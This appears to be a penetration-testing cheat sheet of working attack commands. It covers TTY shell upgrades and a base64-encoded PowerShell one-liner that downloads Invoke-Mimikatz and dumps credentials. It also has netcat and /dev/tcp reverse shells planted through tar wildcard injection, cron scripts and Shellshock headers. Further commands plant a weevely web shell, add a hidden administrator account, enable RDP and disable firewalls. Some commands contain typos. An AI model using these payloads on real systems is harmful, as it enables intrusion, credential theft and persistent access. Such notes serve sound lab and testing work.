Tricks

Reverse Shell Tricks

Spawning a TTY Shell

python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

/bin/sh -i

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

From within IRB

exec "/bin/sh"

From within vi

:!bash

From within vi

:set shell=/bin/bash:shell

From within nmap

!sh

Double characters

Getting double characters (which is annoying)? You can clean that up with:

stty raw -echo

Shell upgrade

How to get a fully functional shell:

• Get a tty shell, e.g.,:

  python -c "import pty;pty.spawn('/bin/bash')"

• Upgrade shell to a tty:

  SHELL=/bin/bash script -q /dev/null

• Set terminal:

  export TERM=xterm-256color

• Switch to the background with CTRL+Z.

• Configure local shell:

  stty raw -echo

• Change to the foreground with

  fg

• Reset the tty with

  reset

  No we have a fully functional shell. CTRL+C terminates the remote process, not the local nc, anymore.

PowerShell Tricks

Invoke-Mimikatz

cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzADsA"

The decoded base64 is:

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

Ubuntu disable firewall

sudo ufw disable

Cron job

Depending on how your linux system is set up, you can look in:

/var/spool/cron/* (user crontabs)
/etc/crontab (system-wide crontab)

also, many distros have:

/etc/cron.d/* These configurations have the same syntax as /etc/crontab
/etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly

These are simply directories that contain executables that are executed hourly, daily, weekly or monthly, per their directory name. On top of that, you can have at jobs (check /var/spool/at/), anacron (/etc/anacrontab and /var/spool/anacron/)

cat /etc/crontab
cat /etc/cron.daily/backup

1. echo "mkfifo /tmp/she; nc 127.0.0.1 9999 0</tmp/she | /bin/sh > /tml/she 2>&1; tm /tmp/she" > shell.sh && chmod +x shell.sh
   echo "" > "--checkpoint-action=exec=sh shell.sh"
   echo "" > --checkpoint=1

   nc -lvnp 9999

2. ls /etc/cron.daily

Cron file

Append

echo 'rm -rf /tmp/p; mknod /tmp/p p; /bin/bash 0</tmp/p | nc 192.168.30.128 1234 >/tmp/p' >> /tab/script.sh

Search for interesting files

find / -name ".*" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null

find -name ".bash_history" -path "/home/*" -exec cat {} \;

find / -user USERtoUSE 2>/dev/null

Look for files owned by root that we could write to. To reduce false positives, only look for files (not symlinks) and exclude proc, which is full of root-owned writable files.

find / -user root -perm -002 -type f -not -path "/proc/*"  2>/dev/null

SUID

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

find / -type f -perm -/o+w 2>/dev/null | grep -Ev '(proc|sys|www)'

weevely

weevely generate mysecret ~/Desktop/mydoor.php

weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mahsecret ls
weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mahsecret

Port knocking with nc

nc -z 192.168.110.101 7000 8000 9000;

Shellshock

ssh -i noob noob@192.168.40.132 '() { :;}; /bin/bash'


wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/id" http://sokar:591/cgi-bin/cat ; cat cat

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://172.16.66.137:591/cgi-bin/cat

egress filter 
User-Agent: () { :;};echo;/bin/echo '/bin/bash -i >& /dev/tcp/192.168.221.139/51242 0>&1 ' > /home/bynarr/.profile;

Quick add Admin and RDP

net user /add caiom MySecurePassword158!

net localgroup administrators caiom /add

To start up the Remote Desktop (RDP) service.

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Configure the firewall to let RDP connections in.

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

Now use rdesktop on Kali to log in to your newly minted account.

rdesktop <IP>

Nmap list all scripts

ls -l /usr/share/nmap/scripts/smb*

Forward traffic from a laptop's wlan0 to eth0

PC

Specify an IP address to eth0 (here 192.168.56.1)

ifconfig eth0 192.168.56.1 netmask 255.255.255.0

Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Forward packets from eth0 to wlan0

iptables -A FORWARD --in-interface eth0 -j ACCEPT

iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Device connected to PC

Setup IP address for eth0,and add gateway

ifconfig eth0 192.168.56.2 netmask 255.255.255.0

route add default gw 192.168.56.1

Kudos, References and Further Reading

• https://gtfobins.github.io/

• https://netsec.ws/?p=337